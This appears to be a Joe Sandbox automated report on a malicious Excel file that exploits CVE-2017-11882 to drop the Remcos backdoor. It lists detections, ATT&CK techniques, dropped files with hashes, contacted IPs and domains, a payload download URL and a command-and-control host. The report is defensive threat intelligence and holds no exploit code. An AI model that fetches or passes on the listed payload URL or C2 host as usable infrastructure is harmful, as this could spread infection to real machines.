Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

Source: C:\Windows\SysWOW64\svchost.exe

Code function: cmd.exe

7_2_0040569A

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	3_2_00A71204
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_00A71806
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	6_2_00DC1204
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_00DC1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	2 Valid Accounts	1 Native API	211 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	23 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	1 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	2 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	2 Valid Accounts	1 DLL Side-Loading	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	221 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Bypass User Account Control	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	1 Masquerading	Cached Domain Credentials	22 Security Software Discovery	VNC	GUI Input Capture	112 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	422 Process Injection	2 Valid Accounts	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
202404294766578200.xlam.xlsx	68%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
202404294766578200.xlam.xlsx	59%	Virustotal		Browse
202404294766578200.xlam.xlsx	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\silvexes\deblaterate.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\CKK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\CKK.exe	75%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\user\AppData\Roaming\CKK.exe	65%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
yuahdgbceja.sytes.net	1%	Virustotal		Browse
geoplugin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.imvu.comr	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://www.ebuddy.com	0%	URL Reputation	safe
http://b.scorecardresearch.com/beacon.js	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp/	0%	Avira URL Cloud	safe
http://23.94.54.101/GVV.exe	100%	Avira URL Cloud	malware
http://23.94.54.101/GVV.exeXC	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gp/	0%	Virustotal		Browse
yuahdgbceja.sytes.net	0%	Avira URL Cloud	safe
http://cache.btrll.com/default/Pix-1x1.gif	0%	Virustotal		Browse
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	Virustotal		Browse
http://23.94.54.101/GVV.exe	15%	Virustotal		Browse
yuahdgbceja.sytes.net	1%	Virustotal		Browse
http://b.scorecardresearch.com/beacon.js	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
yuahdgbceja.sytes.net	23.94.53.100	true	true	1%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.94.54.101/GVV.exe	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
yuahdgbceja.sytes.net	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhvA870.tmp.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://acdn.adnxs.com/ast/ast.js	bhvA870.tmp.10.dr	false		high
http://www.imvu.comr	svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhvA870.tmp.10.dr	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhvA870.tmp.10.dr	false		high
https://support.google.com	svchost.exe, 0000000A.00000003.816775891.0000000001D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.816934273.0000000001D6D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/	svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	svchost.exe, 0000000A.00000003.816695888.0000000001D48000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhvA870.tmp.10.dr	false		high
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhvA870.tmp.10.dr	false		high
http://23.94.54.101/GVV.exeXC	EQNEDT32.EXE, 00000002.00000002.458563608.00000000006D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhvA870.tmp.10.dr	false		high
http://www.nirsoft.net	svchost.exe, 0000000A.00000002.816856030.0000000000224000.00000004.00000010.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	bhvA870.tmp.10.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhvA870.tmp.10.dr	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cache.btrll.com/default/Pix-1x1.gif	bhvA870.tmp.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhvA870.tmp.10.dr	false		high
https://www.google.com	svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	deblaterate.exe, 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://o.aolcdn.com/ads/adswrappermsni.js	bhvA870.tmp.10.dr	false		high
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhvA870.tmp.10.dr	false		high
http://www.msn.com/?ocid=iehp	bhvA870.tmp.10.dr	false		high
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhvA870.tmp.10.dr	false		high
http://static.chartbeat.com/js/chartbeat.js	bhvA870.tmp.10.dr	false		high
http://www.msn.com/de-de/?ocid=iehp	bhvA870.tmp.10.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhvA870.tmp.10.dr	false		high
http://www.nirsoft.net/	svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhvA870.tmp.10.dr	false		high
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhvA870.tmp.10.dr	false		high
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhvA870.tmp.10.dr	false		high
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhvA870.tmp.10.dr	false		high
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhvA870.tmp.10.dr	false		high
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhvA870.tmp.10.dr	false		high
https://www.ccleaner.com/go/app_cc_pro_trialkey	bhvA870.tmp.10.dr	false		high
http://www.imvu.com/	svchost.exe, 0000000C.00000002.813423105.00000000001DC000.00000004.00000010.00020000.00000000.sdmp	false		high
https://contextual.media.net/8/nrrV73987.js	bhvA870.tmp.10.dr	false		high
http://www.imvu.com	svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813506737.00000000002A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://contextual.media.net/	bhvA870.tmp.10.dr	false		high
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhvA870.tmp.10.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhvA870.tmp.10.dr	false		high
http://www.msn.com/	bhvA870.tmp.10.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhvA870.tmp.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhvA870.tmp.10.dr	false		high
http://cdn.at.atwola.com/_media/uac/msn.html	bhvA870.tmp.10.dr	false		high
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhvA870.tmp.10.dr	false		high
https://policies.yahoo.com/w3c/p3p.xml	bhvA870.tmp.10.dr	false		high
http://www.msn.com/advertisement.ad.js	bhvA870.tmp.10.dr	false		high
http://www.ebuddy.com	svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.94.54.101	unknown	United States	36352	AS-COLOCROSSINGUS	true
23.94.53.100	yuahdgbceja.sytes.net	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436298
Start date and time:	2024-05-04 10:00:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	202404294766578200.xlam.xlsx
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLSX@19/18@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 85 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 48056.6648642571 for current running targets taking high CPU consumption Override analysis time to 96113.3297285142 for current running targets taking high CPU consumption Override analysis time to 192226.659457028 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:05:20	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
10:02:36	API Interceptor	27x Sleep call for process: EQNEDT32.EXE modified
10:05:19	API Interceptor	810185x Sleep call for process: svchost.exe modified
10:05:29	API Interceptor	17x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.94.54.101	PO 2_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/ISW.exe
	Order Request1_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/IZG.exe
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	23.94.54.101/GVV.exe
	attachment.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/EPQ.exe
	NI-45733-D.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	23.94.54.101/ESS.exe
23.94.53.100	GVV.exe	Get hash	malicious	Remcos	Browse
23.94.53.100	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse
178.237.33.50	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yuahdgbceja.sytes.net	GVV.exe	Get hash	malicious	Remcos	Browse	23.94.53.100
yuahdgbceja.sytes.net	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	23.94.53.100
geoplugin.net	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	Confirm!!.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.227.130.26
	PIO88938MB.docx.doc	Get hash	malicious	Unknown	Browse	107.172.31.6
	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	172.245.208.13
	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	s9ZjvgSMt1.rtf	Get hash	malicious	Unknown	Browse	192.3.101.142
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	citat #05022024.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.18
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.101.142
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
AS-COLOCROSSINGUS	Confirm!!.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.227.130.26
	PIO88938MB.docx.doc	Get hash	malicious	Unknown	Browse	107.172.31.6
	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	172.245.208.13
	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	s9ZjvgSMt1.rtf	Get hash	malicious	Unknown	Browse	192.3.101.142
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.245.123.18
	citat #05022024.xla.xlsx	Get hash	malicious	Unknown	Browse	172.245.123.18
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.101.142
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	192.3.243.154
ATOM86-ASATOM86NL	QUOTATION#30810.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	proof of payment.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	fatura.bat.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	proof of paymentt.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	586 R1 M-LINE - GEORGIA 03.05.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	xi0TpAxHGMsm.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO-USC-22USC-KonchoCo.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	927
Entropy (8bit):	4.9688781572708915
Encrypted:	false
SSDEEP:	12:tkllndToCsGkMyGWKyGXPVGArwY3P+aoHDGdAvOO+E9F3im51w7bzo9dFmF6hjJd:qlBdT/NuKyGX85qO46m7OdF1zYQ
MD5:	3C0C385570CFE1A630E258416A8D9FDC
SHA1:	619D473E0F0DD8D008998A69F8ADFE749D24C015
SHA-256:	724B4F917DA4600C4DA27E67FA68CA4447CC8F7DD3C711C6025F59E6ED97A8FC
SHA-512:	B537C6F2A22227F19C40995F3FACB488ABB644D61D7945CDD2A6263F31DE193F1D33D1095B8163B4727BEE4E4D3B03BFEF06FC2C6BE09DB460E27162F0C7C286
Malicious:	false
Reputation:	low
Preview:	{. "geoplugin_request":"81.181.54.104",. "geoplugin_status":206,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"",. "geoplugin_region":"",. "geoplugin_regionCode":"",. "geoplugin_regionName":"",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"RO",. "geoplugin_countryName":"Romania",. "geoplugin_inEU":1,. "geoplugin_euVATrate":19,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"45.9968",. "geoplugin_longitude":"24.997",. "geoplugin_locationAccuracyRadius":"200",. "geoplugin_timezone":"Europe\/Bucharest",. "geoplugin_currencyCode":"RON",. "geoplugin_currencySymbol":"lei",. "geoplugin_currencySymbol_UTF8":"lei",. "geoplugin_currencyConverter":4.6208.}

C:\Users\user\AppData\Local\Temp\aut24D0.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\CKK.exe
File Type:	data
Category:	dropped
Size (bytes):	415558
Entropy (8bit):	7.980802161270596
Encrypted:	false
SSDEEP:	6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
MD5:	6167A7957E72F9B3A53C5667A7C56057
SHA1:	00AC978BFF6FA30F4429ECD8810460642C5767B0
SHA-256:	26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
SHA-512:	0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
Malicious:	false
Reputation:	low
Preview:	EA06.........b.5.R..nO:.J.V+Up..i..M...Uh...P...Z..+U.?.w4.O.q\|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.QE.a..i'..6...r..\|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.MiH..;.....6...J.^.I..@..}j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...5D..d...c-l.-:...(.x.W..>8..............EH..2..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.)....L~...~.....I.&.s..P.j....oP.z...W#.X.cI.Rf..."....6QE2k\...sn...7.@.f2.....K.i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X

C:\Users\user\AppData\Local\Temp\aut252E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\CKK.exe
File Type:	data
Category:	dropped
Size (bytes):	9916
Entropy (8bit):	7.600038819371061
Encrypted:	false
SSDEEP:	192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
MD5:	85EC07A5B813744D5460158A4F4C3B75
SHA1:	9A40D20BD37344BB771FA10D81E813397AEA3B90
SHA-256:	64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
SHA-512:	0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut904E.tmp

Download File

Process:	C:\Users\user\AppData\Local\silvexes\deblaterate.exe
File Type:	data
Category:	dropped
Size (bytes):	415558
Entropy (8bit):	7.980802161270596
Encrypted:	false
SSDEEP:	6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
MD5:	6167A7957E72F9B3A53C5667A7C56057
SHA1:	00AC978BFF6FA30F4429ECD8810460642C5767B0
